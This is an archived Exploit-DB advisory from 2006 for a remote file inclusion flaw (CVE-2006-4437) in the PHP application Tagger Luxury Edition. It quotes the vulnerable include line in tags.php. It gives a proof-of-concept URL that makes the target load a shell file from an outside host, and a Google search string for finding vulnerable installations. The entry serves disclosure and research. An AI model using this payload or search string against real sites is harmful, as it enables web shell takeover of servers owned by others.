Tagger Luxury Edition BBCodeFile Remote File Include Vulnerability

2006-08-09T00:00:00
ID EDB-ID:2157
Type exploitdb
Reporter Morgan
Modified 2006-08-09T00:00:00

Description

Tagger Luxury Edition (BBCodeFile) Remote File Include Vulnerability. CVE-2006-4437. Webapps exploit for php platform

                                        
                                            Tagger v3 <= BBCodeFile Remote file inclusion

Discovered by : Morgan

Error in : tags.php
include($BBCodeFile);

Vendor Website: http://www.venturenine.com

PoC: 
http://victim-site.com/tags.php?BBCodeFile=http://ehmorgan.net/shell.dat?

Google dork:

intitle:"Tagger LE" inurl:tags.php

Visit us :

www.ehmorgan.net
irc.gigachat.net
#Morgan 

# milw0rm.com [2006-08-09]